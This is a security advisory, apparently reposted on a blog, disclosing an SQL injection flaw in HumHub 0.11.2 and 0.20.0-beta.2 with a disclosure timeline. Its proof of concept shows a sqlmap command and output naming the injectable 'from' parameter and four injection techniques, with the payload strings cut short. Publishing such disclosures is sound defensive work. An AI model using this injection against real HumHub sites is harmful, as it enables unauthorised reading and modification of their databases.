HumHub - SQL-Injection
------------------------------
Tested Versions
===============
HumHub 0.11.2 and 0.20.0-beta.2
Issue Overview
==============
Vulnerability Type: 89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Technical Risk: high
Likelihood of Exploitation: high
Vendor: HumHub GmbH & Co. KG
Vendor URL: https://www.humhub.org
Credits: LSE Leading Security Experts GmbH employee Eric Sesterhenn
Advisory URL: https://www.lsexperts.de/
Advisory Status: Public
CVE-Number: ----
CVE URL: ---
Impact
======
Enables to read and modify the HumHub Mysql Database.
Issue Description
=================
While conducting an internal software evaluation, LSE Leading
Security Experts GmbH discovered that the humhub social networking
software is subject to an sql-injection attack.
Temporary Workaround and Fix
============================
LSE Leading Security Experts GmbH advises to block
access to the humhub software until the vendor
provides a patch.
Proof of Concept
================
Opening the following URL
http://localhost/humhub/
shows the SQL-error, which is easily exploitable using sqlmap.
./sqlmap.py -u 'http://localhost:9933/humhub/
...
---
Parameter: from (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: r=directory/directory/stream&
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: r=directory/directory/stream&
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: r=directory/directory/stream&
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: r=directory/directory/stream&
---
History
=======
2015-10-14 Issue discovered
2015-10-15 Vendor contacted
2015-10-15 Vendor response and hotfix
2015-10-20 Vendor releases fixed versions
2015-11-30 Advisory release
GPG Signature
=============
This advisory is signed with the GPG key of the
LSE Leading Security Experts GmbH advisories team.
The key can be downloaded here: https://www.lsexperts.de/
Komentarų nėra:
Rašyti komentarą